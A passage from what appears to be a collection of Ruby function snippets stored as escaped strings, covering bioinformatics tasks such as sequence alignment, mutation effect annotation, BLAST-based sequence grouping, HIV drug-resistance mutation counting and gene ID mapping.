Found gags in #{sequence_id_to_gags.length}, but only fixed #{accounted_for_seq_ids.length}\"\n end\n return fixed_sequences\n end",
"def compare_ranges(true_ranges, inferred_ranges, insertion_mode = false)\n matches = 0\n misaligned = 0\n # Sides can be one of \"none\", \"left\", \"right\", \"ambiguous\" or \"both\"\n sides = []\n true_ranges.each_with_index do |t1, i|\n next unless i.even?\n t2 = true_ranges[i+1]\n inferred_ranges.each_with_index do |i1, k|\n next unless k.even?\n old_matches = matches\n old_misaligned = misaligned\n i2 = inferred_ranges[k+1]\n if t1 <= i1 && t2 >= i2\n matches += (i2 - i1)\n side = \"none\"\n side = \"left\" if t1 == i1\n side = \"right\" if t2 == i2\n side = \"both\" if t2 == i2 && t1 == i1\n sides << side\n elsif !insertion_mode && t1 <= i1 && i1 < t2 && t2 <= i2\n matches += (t2 - i1)\n misaligned += i2 - t2\n if t1 == i1\n sides << \"left\"\n else\n sides << \"none\"\n end\n elsif insertion_mode && t1 <= i1 && i1 <= t2 && t2 <= i2\n #puts \"YOUNK\"\n matches += (t2 - i1)\n misaligned += i2 - t2\n #elsif t1 >= i1 && t2 <= i2\n # matches += (t2 - t1)\n # misaligned += (i2 - t2) + (t1 - i1)\n # $logger.debug \"BUBBLES\"\n elsif !insertion_mode && t1 >= i1 && t2 >= i2 && t1 < i2\n matches += (i2 - t1)\n misaligned += (t1 - i1)\n if t2 == i2\n sides << \"right\"\n else\n sides << \"none\"\n end\n elsif insertion_mode && t1 >= i1 && t2 >= i2 && t1 <= i2\n #puts \"YOUNS\"\n matches += (i2 - t1)\n misaligned += (t1 - i1)\n\n end\n $logger.debug \"Matches #{matches}\"\n $logger.debug \"Misaligned #{misaligned}\"\n if matches != old_matches || misaligned != old_misaligned\n inferred_ranges.delete_at(k)\n inferred_ranges.delete_at(k)\n break\n end\n #puts misaligned\n end\n end\n\n inferred_ranges.each_with_index do |i1, k|\n next unless k.even?\n i2 = inferred_ranges[k+1]\n misaligned += i2-i1\n sides << \"none\"\n end\n if matches < 0 || misaligned < 0\n puts matches\n puts misaligned\n exit\n end\n $logger.debug(\"SIDES #{sides}\")\n [matches, misaligned, sides]\nend",
"def mutations_effect(a_anno, a_gen)\n\n if $locus[a_anno[10]] && a_anno[3].length == a_anno[4].length\n $cdna.pos = $locus[a_anno[10]]\n transcript = original()\n exon_starts = a_gen[9].split(',')\n exon_ends = a_gen[10].split(',')\n mutation_position,exon_num = position_on_transcript(a_anno[1],a_gen[3],exon_starts,exon_ends,a_gen[6],a_gen[7])\n a_anno[12] = \"exon#{exon_num}\"\n start_triplet = (mutation_position/3 * 3) - 1\n if start_triplet >= 0\n code = transcript[start_triplet..start_triplet+2]\n pos_in_triplet = mutation_position%3\n original_aa = $codes[code]\n code[pos_in_triplet] = a_anno[4]\n mutated_aa = $codes[code[0..2]]\n if original_aa != mutated_aa\n a_anno[13] = pos_in_triplet + 1\n a_anno[14] = original_aa[:name]\n a_anno[15] = mutated_aa[:name]\n puts a_anno.join(\"\\t\")\n else\n a_anno[13] = \"same_AA\"\n STDERR.puts a_anno.join(\"\\t\")\n end\n end\n else\n if $locus_non_coding[a_anno[10]]\n a_anno[13] = \"ncrna\"\n STDERR.puts a_anno.join(\"\\t\")\n else\n if (a_anno[3].length > a_anno[4].length || a_anno[3].length < a_anno[4].length)\n a_anno[13] = \"indel\"\n puts a_anno.join(\"\\t\")\n else\n a_anno[13] = \"?\"\n STDERR.puts a_anno.join(\"\\t\")\n end\n end\n end\n\nend",
"def print_align(io, sequences, labels, opts={})\n opts = {:cutoff => 70, :start => 0, :chars => 20}.merge(opts)\n (start, length, chars) = opts.values_at(:start, :cutoff, :chars)\n spacer = \" \"\n\n if opts[:template]\n sequences.unshift(opts[:template])\n labels.unshift(opts[:template_label])\n end\n\n all_stats = Array.new(6,0)\n loop do\n fin = false\n\n max_length = 0\n lines = []\n consensus_line = \"\"\n fragments = sequences.map do |string|\n fin = (start >= string.length )\n break if fin\n\n string_frag = string[start, length]\n\n string_frag\n end ; break if fin\n\n doubles = fragments.zip(labels)\n\n doubles = doubles.select {|frag, _| (frag.size > 0) && (frag =~ /[^-]/) }\n\n max_length = doubles.map {|frag, _| frag.size }.max\n\n (cs, stats) = consensus_string_and_stats( doubles.map {|frag,_| frag } )\n all_stats = all_stats.zip(stats).map {|a,b| a + b }\n\n doubles.push( [cs, \"<CONSENSUS>\"] )\n\n lines = doubles.map {|frag, label| [exactly_chars(label, chars),spacer,frag].join }\n\n ## the counters at the top of the line\n start_s = start.to_s\n finish_s = (start + max_length).to_s\n count_line_gap = max_length - (start_s.size + finish_s.size)\n count_line = [start_s, spacer]\n unless count_line_gap < 1\n count_line << \" \" * count_line_gap\n end\n io.puts [exactly_chars(\"\", chars), spacer, count_line.join].join\n\n io.puts lines.join(\"\\n\")\n\n io.puts \" \" # separator between lines\n start += length\n end\n end",
"def sequence_check_for_submission(sequence,group_hash,reversed_group_hash)\n\n result_array = Array.new\n aa_threshold = 0.9\n \n begin\n \n query = Bio::FastaFormat.new( sequence )\n query_name = query.definition\n sequence = query.to_seq\n\n existing_matched_group_exist = CustomizedProteinSequence.find_by(:chain => sequence.seq)\n if !existing_matched_group_exist.nil? # find existing sequence\n result_array << collection(query_name, \"WARN\", \"Your sequence exists in our database. Common Name: #{existing_matched_group_exist.header} \")\n return result_array\n end\n\n sequence.auto # Guess the type of sequence. Changes the class of sequence.\n query_sequence_type = sequence.seq.class == Bio::Sequence::AA ? 'protein' : 'gene'\n\n program = 'blastp'\n database = 'reductive_dehalogenase_protein'\n blast_options = get_blast_options\n\n\n blaster = Bio::Blast.local( program, \"#{Rails.root}/index/blast/#{database}\", blast_options)\n aa_report = blaster.query(sequence.seq) # sequence.seq automatically remove the \\n; possibly other wildcard\n aa_similarity = aa_report.hits().length.to_f / aa_report.db_num().to_f\n identity_with_90 = check_alignment_identity(aa_report, 90) # identity_with_90 contains all the header that share >=90% identity\n\n # group_hash => group : Array {seq_definition}\n # reversed_group_hash = seq_definition : group\n if identity_with_90.length > 0\n identified_group_at_aa_level = get_identified_group(identity_with_90,group_hash,reversed_group_hash) # identified_group_at_aa_level contains confirmed group in aa level \n else\n # if identity_with_90.length == 0; no RD with ~=90% identity => create new RD groups\n\n if aa_similarity >= aa_threshold\n last_group = CustomizedProteinSequence.group(:group).order(:group).last.group\n new_group_number = last_group + 1\n result_array << collection(query_name,\"NEW\", \"Your sequence belongs to a new RD group: #{new_group_number}\",new_group_number)\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity of any sequences in database at amino acid level.\")\n end\n\n return result_array\n end\n\n if identified_group_at_aa_level.length > 0\n result_array << collection(query_name, \"SUCCESS\",\"Your sequence belongs RD group: #{identified_group_at_aa_level.join(\",\")}\",identified_group_at_aa_level.join(\",\"))\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity with all representatives of the group at amino acid level.\")\n end\n\n return result_array\n \n rescue => exception\n # puts exception\n result_array << collection(query_name, \"ERROR\",\"Your sequence is not validated. Or send it to our lab for manual checking.\")\n end\n \n return result_array\n\n end",
"def write\n\n # reverse alignments\n @first_result.reverse!\n @second_result.reverse!\n\n # Create middle section for matches/mismatches\n index = 0\n @first_result.length.times do\n if @first_result[index] == @second_result[index]\n @central_alignment << \"|\"\n else\n @central_alignment << \" \"\n end\n index += 1\n end\n\n offset = @start_first > @start_second ? @start_first.to_s.length : @start_second.to_s.length\n border = \"\"\n\n (offset+1).times do # lines up center with alignments\n border << \"=\"\n end\n\n # formats beginning and end of sequence output\n @first_result.insert(0, @start_first.to_s << \"=\")\n @first_result << \"=\" << @max_cell_row.to_s\n @second_result.insert(0, \"\" << @start_second.to_s << \"=\")\n @second_result << \"=\" << @max_cell_column.to_s\n @central_alignment.insert(0, border)\n @central_alignment << border\n\n # separate sequences and center into at most chunks of at most 60\n first_chunks = @first_result.scan(/.{1,60}/)\n central_chunks = @central_alignment.scan(/.{1,60}/)\n second_chunks = @second_result.scan(/.{1,60}/)\n\n length = first_chunks.length\n\n File.open(\"result.txt\", 'w') {|file| \n i = 0\n length.times do\n file.puts first_chunks[i]\n file.puts central_chunks[i]\n file.puts second_chunks[i]\n file.puts\n i += 1\n end\n }\n\n end",
"def sub_alignment _value=0\n send_cmd(\"sub_alignment #{_value}\")\n end",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts 
[\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def detect_long_insertion(insert_pair, clip_Bs2, clip_Fs2, unmap_seq, alt_read_depth=5)\n paired_indel_list = []\n insert_pair.each do |consensus_b, consensus_f|\n total_depth = consensus_b.depth + consensus_f.depth\n clip_chrpos_all = [consensus_b.start_pos, consensus_b.end_pos, consensus_f.start_pos, consensus_f.end_pos]\n clip_start = clip_chrpos_all.min\n clip_end = clip_chrpos_all.max\n consensus, _ = mafft_consensus([consensus_b, consensus_f], 1.0) # %identity = 1.0\n consensus, trim_flag = trim_consensus(consensus)\n # ---------------------------------------------------------------------------\n\n if consensus.count(\"?\") > 2 # SNP check, if the number of SNPs is more than 2 ( > 2), uncomplete Long Insertion\n #puts \"uncomplete long insertion...\"\n\n # re-alignement using unmapped read\n can_use_unmaps = unmap_seq.find_all do | unmap|\n (unmap.start_pos < clip_start && clip_start < unmap.end_pos) || (unmap.start_pos < clip_end && clip_end < unmap.end_pos)\n end\n if can_use_unmaps.empty? # unmap read is nothing\n clip_B_stt = consensus_b.start_pos # clip_B start pos\n clip_F_end = consensus_f.end_pos # clip_F end pos\n upper_LI = clip_Bs2[clip_B_stt]\n bottom_LI = clip_Fs2[clip_F_end]\n consensus = \"#{upper_LI}-----#{bottom_LI}\"\n if total_depth >= alt_read_depth # end pos is equal to sttpos\n paired_indel_list << Read.new(type: :ULI, start_pos: clip_B_stt, end_pos: clip_B_stt, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = [consensus_b, consensus_f] if @mafft_inputs\n end\n\n else # unmap reads exist\n new_group_reads = ([consensus_b, consensus_f] + can_use_unmaps)\n new_consensus, _ = mafft_consensus(new_group_reads, 1.0) # make a consensus seq with the unmapped reads\n new_consensus, trim_flag = trim_consensus(new_consensus)\n\n if new_consensus.empty? || new_consensus.count(\"?\") > 2 # SNP check, if the number of SNPs is more than 2 ( >=3)\n clip_B_stt = consensus_b.start_pos # clip_B start pos\n clip_F_end = consensus_f.end_pos # clip_F end pos\n upper_LI = clip_Bs2[clip_B_stt]\n bottom_LI = clip_Fs2[clip_F_end]\n consensus = \"#{upper_LI}-----#{bottom_LI}\"\n if total_depth >= alt_read_depth # end pos is equal to sttpos\n paired_indel_list << Read.new(type: :ULI, start_pos: clip_B_stt, end_pos: clip_B_stt, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = new_group_reads if @mafft_inputs\n end\n else\n new_consensus, _ = mafft_consensus(new_group_reads, 0.5) # make a consensus seq with the unmapped reads\n new_consensus = trim_consensus_with_flag(new_consensus, trim_flag)\n\n new_total_depth = new_group_reads.inject(0){|res, read| res += read.depth}\n if new_total_depth >= alt_read_depth ####\n paired_indel_list << Read.new(type: :LI_wU, start_pos: clip_start, end_pos: clip_end, seq: new_consensus, depth: new_total_depth)\n @mafft_inputs[paired_indel_list.last] = new_group_reads if @mafft_inputs\n end\n end\n end\n\n else\n consensus, _ = mafft_consensus([consensus_b, consensus_f], 0.5) # %identity = 0.5, consensus update\n consensus = trim_consensus_with_flag(consensus, trim_flag)\n\n #puts \"complete long insertion...\"\n #puts align_reads_names\n #puts\n if total_depth >= alt_read_depth ####\n paired_indel_list << Read.new(type: :LI, start_pos: clip_start, end_pos: clip_end, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = [consensus_b, consensus_f] if @mafft_inputs\n end\n end\n end\n return paired_indel_list\n end",
"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def alignment_strings(start=0,stop=self.length,organisms=nil) \n answer = Array.new \n self.genomic_aligns.each do |contig|\n if organisms.nil? # if no organisms were specified to limit the results\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name)) unless sequence.nil?\n else\n if organisms.include?(contig.find_organism)\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name))\n end\n end \n end\n return answer \n end",
"def checkCompatibility(sampleTypes, expectedLengths) \n # can't run RNA and DNA together! error if attempted\n if(sampleTypes.uniq.length>1)\n return 0\n end\n end",
"def check_duplication (n=10)\n\n # get the first n hits\n less_hits = @hits[0..[n-1,@hits.length].min]\n averages = []\n\n less_hits.each do |hit|\n # indexing in blast starts from 1\n start_match_interval = hit.hsp_list.each.map{|x| x.hit_from}.min - 1\n end_match_interval = hit.hsp_list.map{|x| x.hit_to}.max - 1\n \n #puts \"#{hit.xml_length} #{start_match_interval} #{end_match_interval}\" \n\n coverage = Array.new(hit.xml_length,0)\n hit.hsp_list.each do |hsp|\n aux = []\n # for each hsp\n # iterate through the alignment and count the matching residues\n [*(0 .. hsp.align_len-1)].each do |i|\n residue_hit = hsp.hit_alignment[i]\n residue_query = hsp.query_alignment[i]\n if residue_hit != ' ' and residue_hit != '+' and residue_hit != '-'\n if residue_hit == residue_query \n idx = i + (hsp.hit_from-1) - hsp.hit_alignment[0..i].scan(/-/).length \n aux.push(idx)\n #puts \"#{idx} #{i} #{hsp.hit_alignment[0..i].scan(/-/).length}\"\n # indexing in blast starts from 1\n coverage[idx] += 1\n end\n end\n end\n end\n overlap = coverage.reject{|x| x==0}\n averages.push(overlap.inject(:+)/(overlap.length + 0.0))\n end\n \n # if all hsps match only one time\n if averages.reject{|x| x==1} == []\n return [\"NO\",1]\n end\n\n R.eval(\"library(preprocessCore)\")\n\n #make the wilcox-test and get the p-value\n R.eval(\"coverageDistrib = c#{averages.to_s.gsub('[','(').gsub(']',')')}\")\n R. eval(\"pval = wilcox.test(coverageDistrib - 1)$p.value\")\n pval = R.pull \"pval\"\n\n if pval < 0.01\n status = \"YES\"\n else\n status = \"NO\"\n end\n return [status, pval]\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def align\n @genome = Genome.find(params[:id])\n @proteins = Protein.all\n @method = params[:method]\n\n if params[:method] == 'local'\n @message = 'Local alignment'\n align_all_local\n elsif params[:method] == 'global'\n @message = 'Global alignment'\n align_all_global\n end\n\n end",
"def sdrm_pr_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"PR\"\n rf_label = 0\n start_codon_number = 1\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = hiv_protease(aa_seq)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
